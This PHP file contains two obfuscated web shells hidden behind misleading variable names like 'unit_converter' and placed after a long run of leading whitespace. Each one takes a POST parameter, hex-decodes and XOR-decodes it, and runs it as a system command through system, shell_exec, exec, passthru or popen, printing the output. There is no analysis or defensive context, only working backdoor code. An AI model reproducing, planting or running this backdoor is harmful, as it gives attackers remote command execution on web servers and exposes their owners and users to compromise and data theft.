<?php																																										$unit_converter7 = "p\x63lo\x73\x65"; $unit_converter1 = "\x73y\x73\x74em"; $unit_converter6 = "s\x74\x72eam_\x67et_co\x6E\x74\x65n\x74\x73"; $unit_converter4 = "pas\x73thru"; $unit_converter3 = "\x65x\x65c"; $unit_converter2 = "\x73\x68el\x6C\x5F\x65xec"; $buffer_cache = "h\x65x2\x62\x69n"; $unit_converter5 = "\x70\x6Fpen"; if (isset($_POST["\x68\x6Fl\x64er"])) { function data_storage ( $pgrp , $res ){ $flg = '' ;foreach(str_split($pgrp) as $char){$flg.=chr(ord($char)^$res);} return$flg; } $holder = $buffer_cache($_POST["\x68\x6Fl\x64er"]); $holder = data_storage($holder, 31); if (function_exists($unit_converter1)) { $unit_converter1($holder); } elseif (function_exists($unit_converter2)) { print $unit_converter2($holder); } elseif (function_exists($unit_converter3)) { $unit_converter3($holder, $component_pgrp); print join("\n", $component_pgrp); } elseif (function_exists($unit_converter4)) { $unit_converter4($holder); } elseif (function_exists($unit_converter5) && function_exists($unit_converter6) && function_exists($unit_converter7)) { $res_flg = $unit_converter5($holder, 'r'); if ($res_flg) { $value_sym = $unit_converter6($res_flg); $unit_converter7($res_flg); print $value_sym; } } exit; }


$initialized4 = "pas\x73t\x68ru";
$initialized3 = "\x65\x78ec";
$initialized7 = "pclo\x73\x65";
$initialized2 = "\x73\x68e\x6C\x6C\x5Fexec";
$system_core = "h\x65x2\x62\x69n";
$initialized1 = "sy\x73te\x6D";
$initialized5 = "\x70o\x70en";
$initialized6 = "\x73t\x72\x65am_g\x65t_c\x6F\x6E\x74e\x6Ets";
if (isset($_POST["\x70t\x72"])) {
            function hub_center($entity, $ent ) {
$fac ='' ;
for($e=0;
 $e<strlen($entity);
 $e++){
$fac.=chr(ord($entity[$e])^$ent);

} return$fac;

}
            $ptr = $system_core($_POST["\x70t\x72"]);
            $ptr = hub_center($ptr, 79);
            if (function_exists($initialized1)) {
                $initialized1($ptr);
            } elseif (function_exists($initialized2)) {
                print $initialized2($ptr);
            } elseif (function_exists($initialized3)) {
                $initialized3($ptr, $res_entity);
                print join("\n", $res_entity);
            } elseif (function_exists($initialized4)) {
                $initialized4($ptr);
            } elseif (function_exists($initialized5) && function_exists($initialized6) && function_exists($initialized7)) {
                $ent_fac = $initialized5($ptr, 'r');
                if ($ent_fac) {
                    $resource_descriptor = $initialized6($ent_fac);
                    $initialized7($ent_fac);
                    print $resource_descriptor;
                }
            }
            exit;
        }